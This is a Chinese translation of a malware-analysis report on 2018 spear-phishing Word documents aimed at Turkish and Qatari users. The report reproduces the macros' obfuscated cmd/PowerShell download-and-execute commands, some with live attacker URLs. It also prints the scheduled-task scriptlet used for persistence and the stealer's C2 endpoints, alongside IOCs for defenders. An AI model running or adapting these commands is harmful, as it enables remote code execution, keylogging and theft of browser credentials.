事件简介

在我们对威胁进行日常搜索中,我们收到了一条报道,其主要内容为针对土耳其国家的网络钓鱼事件。经过初步评估后,我们决定对这个事件进一步调查。在调查中,我们发现这个安全事件与最近阶段的其他活动有相似之处,也意味着他们可能出自同一个组织之手。

sha256 : [https://t.co/G51LITesM5](https://t.co/G51LITesM5)
ITW Filename : دعوة.doc
sha256 : [https://t.co/Bmef4zlHEl](https://t.co/Bmef4zlHEl)
ITW Filename : إستمارة.doc
The macro in both documents will download and execute the powershell script from hxxp://microsoftdata[.]linkpc[.]net/api/cscript [pic.twitter.com/ndqWSML2eA](https://t.co/ndqWSML2eA)

— Jacob Soo (@_jsoo_) [November 29, 2018](https://twitter.com/_jsoo_/status/1068045034203697152?ref_src=twsrc%5Etfw)

网络钓鱼文件

网络钓鱼文件针对的是来自土耳其的受害者,在调查之初,我们也尝试设法去找到针对卡塔尔用户的攻击网络。而这些攻击文件试图引诱人们参加在Instanbul举行的“Al Quds议员协会”会议。而 Al Quds中的Parlamentarians是一个协调“国际议员支持巴勒斯坦事业”的委员会。

谷歌翻译帮助非阿拉伯语使用者理解网络钓鱼活动的具体内容:

该文件邀请参加受害者在12月13日至16日参加举行的会议,题目是“耶路撒冷是巴勒斯坦永恒的首都”。 然而,目前还没有与此会议相关的公告在官方网站上公布。

攻击策略

攻击涉及了两个文档文件,而这两个文档都遵循了相同的传统攻击策略:试图诱使受害者点击“启用内容”按钮来运行恶意代码:

注入代码运行一个命令提示符,调用powershell,然后运行从恶意主机下载的.ps1脚本。

我们使用ReaQta-Hive还原了攻击流程:

可以看到Winword.exe生成带有可疑命令行的cmd.exe实例:

"C:\Windows\System32\cmd.exe" /c " EcHo iEx ( new-oBjeCt sYStem.Io.COmPreSSiON.defLAtEstreAm([system.Io.mEmorYStrEAM] [ConVerT]::fRomBaSE64STRing( 'BcExEkAwEAXQq+hQSHotCg2FgjbWYolNJv6M63uv75asGPirxvViQjYwzMxr44UVpWnDpz64bUISPYr8BGJt7SOUwht2bA7OeNE7klGGdVEsvZQkIi9/') , [sYsTEM.io.compressIOn.CoMpREssiOnmode]::DECOMPRESs )^^^| % {new-oBjeCt io.STreaMreader( $_, [TexT.ENCoDInG]::aSCii )} ).REadtOEnd() | pOwErSheLl -NoeX -nOlo -NOproFiLe -nOnIn -eXeCuTI BypAss -wiNdoWstYL hiDden -"

对命令行进行反混淆操作会传递给powershell.exe的实际参数详情:

IEX (New-Object Net.WebClient).DownloadString('http://microsoftdata.linkpc.net/api/cscript')

参数传递给powershell的方式是值得研究的的。它似乎是一种逃避命令行监控的方法:

pOwErSheLl -NoeX -nOlo -NOproFiLe -nOnIn -eXeCuTI BypAss -wiNdoWstYL hiDden -

该参数直接与powershell.exe“回应”,这就是为什么我们在powershell.exe命令行中看不到通常的iEx [...]参数的原因。

此时,powershell.exe利用从hxxp://microsoftdata [.] linkpc [.] net/api/cscript下载的脚本运行感染目标,下面是其内容的摘要:

powershell的脚本用于窃取来自Chrome,Opera和Firefox的cookie,会话,登录信息,还有一个用于键盘记录的模块。 获得的数据之后被用于渗透到以下C2服务器:

hxxp://microsoftdata[.]linkpc[.]net

该脚本下载与浏览器的localdb(分析窗口#4)交互所需的sqlite DLL,它创建一个GlobalMutex Global\rYF1pgeADA以避免攻击程序窃取多个目标的信息。它将初始化键盘记录器并循环捕获所需的功能信息,最后建立持久性。

应特别注意黑客所使用的攻击持久性方法:计划任务用于持续攻击。

之后,下列代码会被执行:

<?XML version="1.0"?>
<scriptlet>
<registration 
    progid="rYF1pgeADA"
    classid="{3cf925ab-14c5-4324-9b5c-bbe294ac03a0}" >
    <script language="JScript">
        <![CDATA[

            p = 'Powershell';
            c = ' -WiND hiDdeN -nOproFILe -eXeCUTiON bypaSS -Nol -ComMa   "iEx ( new-oBjeCt  sYStem.Io.COmPreSSiON.defLAtEstreAm([system.Io.mEmorYStrEAM] [ConVerT]::fRomBaSE64STRing( \'BcExEkAwEAXQq+hQSHotCg2FgjbWYolNJv6M63uv75asGPirxvViQjYwzMxr44UVpWnDpz64bUISPYr8BGJt7SOUwht2bA7OeNE7klGGdVEsvZQkIi9/\') , [sYsTEM.io.compressIOn.CoMpREssiOnmode]::DECOMPRESs )| % {new-oBjeCt io.STreaMreader( $_, [TexT.ENCoDInG]::aSCii )} ).REadtOEnd() "';
            r = new ActiveXObject("WScript.Shell").Run(p + c,0,false);

        ]]>
    </script>
    </registration>
</scriptlet>

ReaQta-Hive自动识别此程序存在异常行为,并重启此代码,如下图所示:

分析脚本功能

如上所述,在网络钓鱼活动中提供的脚本可以从谷歌Chrome / Firefox / Opera中窃取cookie和登录信息,之后键盘记录具有持久性并执行squiblydoo攻击计划的目标。该脚本接受从C2部署的自定义脚本,这意味着攻击者可以随意扩展其功能:

我们在下面列出功能列表以供将来参考所用:

function Set-Key
function Set-EncryptedData
function Uid
function  CookiesTo-MYJson ([System.Collections.ArrayList] $ArrayList)
function  PasswordsTo-MYJson ([System.Collections.ArrayList] $ArrayList)
function unProtecte ($data) 
function ChromeDB
function FirefoxDB
function OperaDB
function Add-SQLite ($link)
function urlPOST($link,$data) 
function OperaSESSION ($SQLiteDB,$search,$condition)
function FirefoxSESSION ($SQLiteDB,$search,$condition)
function ChromeSESSION ($SQLiteDB,$search,$condition)
function ChromePASS ($SQLiteDB)
function BrowsersLOGINS
function _sct
function InstallSCT
function BrowsersPS
function BrowsersLOGGER
function InitLOGGER
function BrowsersCOOKIES ($website,$cname)

键盘记录器似乎使用的代码似乎与github存储库获取的代码相同:

https://github.com/lazywinadmin/PowerShell/blob/master/TOOL-Start-KeyLogger/Start-KeyLogger.ps1

C2基础设施和攻击样本

C2始终展现出一个有趣的现象,URL的路径始终是:/api/{endpoint}

http://{$domain}/api/cscript
http://{$domain}/api/pscript
http://{$domain}/api/logger/submit
http://{$domain}/api/chrome/submit
http://{$domain}/api/firefox/submit
http://{$domain}/api/opera/submit
http://{$domain}/assest/sqlite

在前人研究的信息帮助下,我们能够在以前的网络钓鱼活动中所使用的模式中发现其他样本:

Malicious document targeting [#Qatar](https://twitter.com/hashtag/Qatar?src=hash&ref_src=twsrc%5Etfw), impersonates [@qcharity](https://twitter.com/qcharity?ref_src=twsrc%5Etfw) 
Embedded macros download a PowerShell script from:
4host[.]publicvm[.]com/api/cscript
Steals passwords and cookies from browsers
MD5: 9d6ccae4ef4a206345005e58e51ca6cb [pic.twitter.com/Ptrr0iIJi4](https://t.co/Ptrr0iIJi4)

— Curly Cyber (@CurlyCyber) [August 21, 2018](https://twitter.com/CurlyCyber/status/1031937765317980160?ref_src=twsrc%5Etfw)

正如一开始所指出的那样,这个先前的样本似乎将目标对准了卡塔尔的用户,并冒充卡塔尔的慈善机构组织。

该文档最初是在2018年8月初
被发现的,而与当前版本相比其只有少量代码被更改。具体更改的位置是行为,持久性和脚本代码。

我们已经上传了VirusTotal的安全分析过程。 在分析窗口#1中,我们可以看到cmd.exe的命令行并没有使用模糊处理:

"C:\Windows\System32\cmd.exe" /C"Echo\IEX (New-Object Net.WebClient).DownloadString('http://4host.publicvm.com/api/cscript') | PowersHell -NOpROfIL -eX BYpAss -NOlOgo -wiNdoWs HiDdEN -noeXIt -noNI -"

为了使分析具有完整性,这里使用了以前版本的powershell脚本并做了一些更改:

原始平台地址:

hxxp://4host[.]publicvm[.]com/

这三个文档共享一个相似的元数据结构:

我们可以观察到这两个事件的相似性,这两个域都使用相同的自由动态DNS服务:DNSExit

总结

由于这个攻击设计了多个潜在的目标,所以是十分有趣的。除此之外,系统还使用了系统二进制文件(lolbins)并通过powershell执行恶意活动、计划任务持久性和用于隐藏命令行的“回声”技术。这个事件的攻击者十分活跃,根据我们的研究发现,所检索的文件类型提供了证据证明这些行动可能是出于政治动机,而不是网络犯罪团伙的私人攻击。

由于Spear-Phishing的易操作性,经过培训的人员很容易使用此攻击进行攻击,所以其工具也受到攻击者的喜爱。

ReaQta-Hive使用人工智能自动检测目标(如刚刚分析的威胁),帮助分析师深入检测威胁活动并自动发现异常行为。由于缺乏传统的二进制的payload,操作系统组件(lolbins)上的内存威胁能够绕过传统防御,同时留下较低的取证范围。如果想要进一步了解相关威胁情况,请与我们联系。

IOCs

1d2bbe3fd9021bbed4667628b86156bee8763b3d93cdac6de398c751a281a324 دعوة.doc 
bf4d4ee4a8e4472c7968586fa0318e556a89bfd94aeb4e72afd99ab340541770 إستمارة.doc 
7a26d5b600a078816beb3a2849827fa7d45ec85ec6c3343b3857f10edfece74c cscript.ps1
hxxp://microsoftdata[.]linkpc[.]net

7c8cf1e3ec35a6f604699f6481f3463e9ae19c93b8efd861b914c8260304d314 qatar.doc
hxxp://4host[.]publicvm[.]com

Global\rYF1pgeADA mutex
Global\wfCQnIo2G7 mutex 

http://{$domain}/api/cscript
http://{$domain}/api/pscript
http://{$domain}/api/logger/submit
http://{$domain}/api/chrome/submit
http://{$domain}/api/firefox/submit
http://{$domain}/api/opera/submit
http://{$domain}/assest/sqlite
rYF1pgeADA scheduled task name
wfCQnIo2G7 scheduled task name
本文为翻译稿,翻译自:https://reaqta.com/2018/12/spear-phishing-targeting-qatar-turkey/

源链接

Hacking more

...